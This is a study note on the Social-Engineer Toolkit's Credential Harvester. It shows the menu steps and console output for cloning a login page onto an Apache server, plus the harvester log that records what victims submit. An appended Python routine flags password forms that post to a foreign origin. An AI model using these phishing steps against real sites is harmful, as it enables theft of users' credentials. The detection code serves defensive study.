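!!! These notes are for study and discussion only; do not use them for any other purpose !!!
setoolkit is a very useful social-engineering toolkit that bundles many tools; here the author only notes down its simplest usage.
The basic flow for cloning a website with setoolkit: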
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
1) Social-Engineering Attacks
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
99) Return to Webattack Menu
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.test.com/login.php
[*] Cloning the website: http://www.test.com/login.php
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] Apache is set to ON - everything will be placed in your web root directory of apache.
[*] Files will be written out to the root directory of apache.
[*] ALL files are within your Apache directory since you specified it to ON.
[!] Apache may be not running, do you want SET to start the process? [y/n]: y
[....] Starting web server: apache2apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
Apache webserver is set to ON. Copying over PHP file to the website.
Please note that all output from the harvester will be found under apache_dir/harvester_date.txt
Feel free to customize post.php in the /var/www directory
[*] All files have been copied to /var/www
{Press return to continue}
Once a user visits the cloned site and enters data, we can see the log on the back end:
harvester_2014-06-01 18:12:39.762872.txt index.html post.php
[redirect_to] => http://www.test.com/login.php
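Notes:
The author does not come from a web development background and is not very familiar with it. After a quick look at the two files index.html and post.php, it seems that cloning a site this way is quite limited: the form has to be submitted via POST for it to work. I am not sure whether this is right; if any expert passes by, please point me in the right direction.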
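Seen from the defender's side, the POST dependency noted above is also what makes such a clone recognizable. The following check is an added example, not part of the original notes or of SET: it flags password forms that POST to an origin other than the real login URL. The address 192.0.2.10, both HTML samples and all function names are constructed, and it is an assumption that the clone's form submits to post.php on the host serving it.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

EXPECTED = "http://www.test.com/login.php"  # the real login URL from the notes
# Constructed samples: a genuine login form and a clone served from another host.
LEGIT_HTML = '<form method="post" action="login.php"><input type="password" name="p"></form>'
CLONED_HTML = '<form method="POST" action="post.php"><input type="password" name="p"/></form>'


class FormCollector(HTMLParser):
    """Record method, action and password-field presence for every <form>."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"method": (a.get("method") or "get").lower(),
                             "action": a.get("action") or "",
                             "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def origin(url):
    """Scheme, host and effective port, so http://h and http://h:80 compare equal."""
    p = urlsplit(url)
    scheme = p.scheme.lower()
    return scheme, (p.hostname or "").lower(), p.port or {"http": 80, "https": 443}.get(scheme)


def audit_login_page(html, served_from, expected_login_url):
    """Return resolved targets of password forms that POST outside the expected origin."""
    collector = FormCollector()
    collector.feed(html)
    findings = []
    for form in collector.forms:
        target = urljoin(served_from, form["action"])  # relative action resolves to serving host
        if (form["has_password"] and form["method"] == "post"
                and origin(target) != origin(expected_login_url)):
            findings.append(target)
    return findings
```

A page that collects credentials through script rather than a plain form POST is outside what this check sees, so treat an empty result as "no finding", not as "safe".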